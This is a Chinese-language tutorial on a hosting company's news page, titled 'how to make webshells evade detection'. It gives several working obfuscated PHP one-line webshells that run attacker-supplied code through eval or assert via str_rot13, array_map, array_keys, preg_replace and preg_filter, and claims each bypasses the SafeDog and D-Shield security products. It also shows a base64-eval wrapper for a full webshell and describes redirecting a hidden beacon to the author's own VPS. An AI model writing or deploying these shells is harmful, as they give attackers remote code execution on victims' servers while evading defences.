新西兰服务器
  • 电 话:400-808-5836
  • MSN :huad@live.com
  • 客服QQ:4698328 9291215
  • 咨询邮箱:sales@fobhost.com
  • 售后:services@fobhost.com
  • https://www.gaofangfuwuqi.com/
    • 首页 新闻资讯 Webshell免杀怎么实现

    Webshell免杀怎么实现


    Webshell免杀怎么实现

    发布时间:2021-12-17 16:52:30 来源:高防服务器网 阅读:64 作者:iii 栏目:网络管理

    本篇内容主要讲解“Webshell免杀怎么实现”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“Webshell免杀怎么实现”吧!

    一句话木马

    在渗透测试中最常用的就是一句话后门(小马)和中国菜刀的配合。如果出现某种WAF防护,就寻找一个免杀的大马挂马。

    最常见的php一句话木马

    <?php  @eval($_POST['x']);?>

    这个一句话木马由两部分组成,eval用来执行接收的代码。$_POST['x']来接收数值。

    本着这个原则,尝试改写一句话木马绕过WAF。

    搜集了几个常用的php函数

    执行代码的eval、assert、preg_replace

    接收数据的$_POST、$_GET、$_REQUEST

    php一句话免杀

    str_rot13函数

    <?php  $c=str_rot13('nffreg');  $c($_REQUEST['x']);  ?>

    str_rot13函数来替代assert。该函数对字符串执行ROT13编码。ROT13编码就是把每个字母在字母表中移动13位。

    测试发现无法绕过安全狗。修改一下。

    <?php  function xiaoma($a){  $c=str_rot13('nffreg');  $c($a);  }  xiaoma($_REQUEST['x']);  ?>

    即可绕过安全狗。

    <?php  class One{  function xiaoma($x){  $c=str_rot13('n!ff!re!nffreg');  $str=explode('!',$c)[3];  $str($x);  }  }  $test=new One();  $test->xiaoma($_REQUEST['x']);  ?>

    再次修改,加了explode函数分割字符串,class封装类。可绕过D盾。

    array_map函数

    array_map() 函数将函数作用到数组中的每个值上,并返回一个新的数组。

    <?php  $a1=array("1234","123456");  $a2=array(@$_REQUEST['x'],"1234");  $a=array_map(null,$a1,$a2)[0][1];  assert($a);  ?>

    即可绕过安全狗。

    array_key函数

    array_key() 函数也是返回包含数组的一个新数组。

    <?php  $a=array($_REQUEST['x']=>"3");  $b=array_keys($a)[0];  eval($b);  ?>

    索引数组变化为关联数组。

    即可绕过安全狗、D盾。

    preg_replace函数

    用来正则匹配的一个函数。

    <?php  function func(){  return $_REQUEST['x'];  }  preg_replace("/test/e",func(),"i am test");  ?>

    /e用来当做php代码解析。5.6版本以下实用。

    测试可绕过安全狗和D盾。

    preg_filter函数

    根据preg_replace修改为preg_filter函数,也是用来执行正则的匹配替换。

    <?php  $a=preg_filter('/s+/','','as s er t');  $a($_REQUEST['x']);  ?>

    也可以绕过D盾、安全狗。

    其他

    <?php  function test($a){  $arr = array('a','s','s','e','r','t');  $func = '';  for($i=0;$i<count($arr);$i++) {  $func.=$func.$arr[$i];  }  $func=substr($func,-6);  $func($a);  }  test($_REQUEST['x']);  ?>

    也可以绕过D盾、安全狗。

    php免杀大马

    正好自己手里有一个php大马。但不免杀。尝试将源码base64加密后修改为php免杀大马。

    将大马eval函数变为exit或者echo。burp抓取源代码。

    将源代码拷贝下来,审计发现给源码存在一处后门。

    base64解码一下

    哦!!!真是可以。

    将该base64地址修改为自己的vps地址。嘻嘻。

    那现在只要eval函数可以执行这传base64的字符串就可以啦。

    WAF对base64_encode、base64_decode查杀非常严格。

    不断搜索、修改、编写,最终成功。

    <?php  header("Content-type: text/html; charset=utf-8");  class one{  public function dama(){  $l='base';  $o='64_de';  $v='co';  $e='de';  $love=$l.$o.$v.$e;  $c="love";  $shellname='网站安全检测';  $password='xxx';  $myurl='http://www.xxx.com';  $a=$$c('code');//php源码  @eval($a);  }  }  $person = new one;  $person->dama();  ?>

    直接将php大马源码放在code处。即可。

    也可以改造php免杀一句话木马。

    比如这款

    <?php  header("Content-type: text/html; charset=utf-8");  function test($code){  $password='xxx';  $a=preg_filter('/s+/','','base 64 _ deco de');  $c=$a($code);  @eval($c);  }  $code='';	//code存放php大马  test($code);  ?>

    访问一下。

    查看vps是否接收到。

    到此,相信大家对“Webshell免杀怎么实现”有了更深的了解,不妨来实际操作一番吧!这里是高防服务器网网站,更多相关内容可以进入相关频道进行查询,关注我们,继续学习!

    [微信提示:高防服务器能助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。

    [图文来源于网络,不代表本站立场,如有侵权,请联系高防服务器网删除]
    [